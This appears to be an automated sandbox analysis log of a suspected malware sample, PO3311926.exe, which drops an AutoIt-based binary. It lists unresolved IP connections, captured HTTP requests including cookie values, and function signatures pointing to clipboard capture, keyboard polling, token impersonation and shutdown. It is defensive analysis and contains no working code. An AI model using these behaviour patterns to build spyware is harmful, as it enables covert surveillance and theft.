                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.26
                          Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.26
                          Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.26
                          Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.26
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.26
                          Source: unknownTCP traffic detected without corresponding DNS query: 72.21.81.240
                          Source: unknownTCP traffic detected without corresponding DNS query: 72.21.81.240
                          Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.26
                          Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.26
                          Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.26
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_0060D7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,8_2_0060D7A1
                          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VT3pXKsaaw8sTtx&MD=cPzR33Sv HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VT3pXKsaaw8sTtx&MD=cPzR33Sv HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGKXUvbEGIjD-kgWdpW8hT-9hc2nj_b9H1bs6sOSvG1viHx2oR-H037B_HudVAHyts9ARK3nBSXsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-29-09; NID=513=i4vGxEho67hIbT78H4sdvR3RiGAbuswNQATGLpxg1ZwbZWfPfJEEpO9gKebEs9GpjkyVn_LdpJxbX71dSG1YWSxKprI50Iw_R0SzrRyArmtuuOy3FX2os12m5mg3IOH4454YlQzymsc0wKOKj9gGLzAcNZLcSnF8tYSI_CuAr-Y
                          Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGKXUvbEGIjDdp0aB_5C1gr2eixUtAMj4mBUQzkJ9vh0Q2d77njF6aqNILXZ84lvrwl1-Gwx1dfsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-29-09; NID=513=i4vGxEho67hIbT78H4sdvR3RiGAbuswNQATGLpxg1ZwbZWfPfJEEpO9gKebEs9GpjkyVn_LdpJxbX71dSG1YWSxKprI50Iw_R0SzrRyArmtuuOy3FX2os12m5mg3IOH4454YlQzymsc0wKOKj9gGLzAcNZLcSnF8tYSI_CuAr-Y
                          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                          Source: global trafficDNS traffic detected: DNS query: www.google.com
                          Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                          Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                          Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                          Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                          Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                          Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                          Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                          Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                          Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                          Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                          Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                          Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000000.1648993329.0000000000B35000.00000002.00000001.01000000.0000000E.sdmp, sdadbtvsh.bin.exe, 0000001A.00000000.1866878871.0000000000B35000.00000002.00000001.01000000.0000000E.sdmp, sdadbtvsh.bin.exe, 00000023.00000002.2210000278.0000000000B35000.00000002.00000001.01000000.0000000E.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
                          Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                          Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.drString found in binary or memory: https://www.globalsign.com/repository/0
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                          Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.8:49705 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.8:49710 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 23.221.246.93:443 -> 192.168.2.8:49729 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 23.221.246.93:443 -> 192.168.2.8:49730 version: TLS 1.2
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_0060F45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,8_2_0060F45C
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_0060F6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,8_2_0060F6C7
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00ADF6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,20_2_00ADF6C7
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_0060F45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,8_2_0060F45C
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005FA54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,8_2_005FA54A
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_00629ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,8_2_00629ED5
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00AF9ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,20_2_00AF9ED5

                          System Summary

                          barindex
                          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BA6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00BA6FAA
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005F1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,8_2_005F1A91
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005FF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,8_2_005FF122
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00ACF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,20_2_00ACF122
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BA848E0_2_00BA848E
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BB6CDC0_2_00BB6CDC
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BB00B70_2_00BB00B7
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BB40880_2_00BB4088
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BA40FE0_2_00BA40FE
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BC51C90_2_00BC51C9
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BB71530_2_00BB7153
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BA32F70_2_00BA32F7
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BB62CA0_2_00BB62CA
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BB43BF0_2_00BB43BF
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BAC4260_2_00BAC426
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BAF4610_2_00BAF461
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BCD4400_2_00BCD440
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BB77EF0_2_00BB77EF
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BCD8EE0_2_00BCD8EE
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BA286B0_2_00BA286B
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BAE9B70_2_00BAE9B7
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BD19F40_2_00BD19F4
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BB3E0B0_2_00BB3E0B
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BC4F9A0_2_00BC4F9A
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BAEFE20_2_00BAEFE2
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005B20078_2_005B2007
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005B80378_2_005B8037
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005AE0BE8_2_005AE0BE
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_0059E1A08_2_0059E1A0
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_0059225D8_2_0059225D
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005B22C28_2_005B22C2
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005CA28E8_2_005CA28E
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005AC59E8_2_005AC59E
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_0061C7A38_2_0061C7A3
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005CE89F8_2_005CE89F
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_0060291A8_2_0060291A
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005C6AFB8_2_005C6AFB
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005F8B278_2_005F8B27
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005BCE308_2_005BCE30
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005C71698_2_005C7169
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_006251D28_2_006251D2
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005992408_2_00599240
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005994998_2_00599499
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005B17248_2_005B1724
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005B1A968_2_005B1A96
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_00599B608_2_00599B60
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005B7BAB8_2_005B7BAB
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005B1D408_2_005B1D40
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005B7DDA8_2_005B7DDA
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A7E0BE20_2_00A7E0BE
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A8803720_2_00A88037
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A8200720_2_00A82007
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A6E1A020_2_00A6E1A0
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A9A28E20_2_00A9A28E
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A822C220_2_00A822C2
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A6225D20_2_00A6225D
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A7C59E20_2_00A7C59E
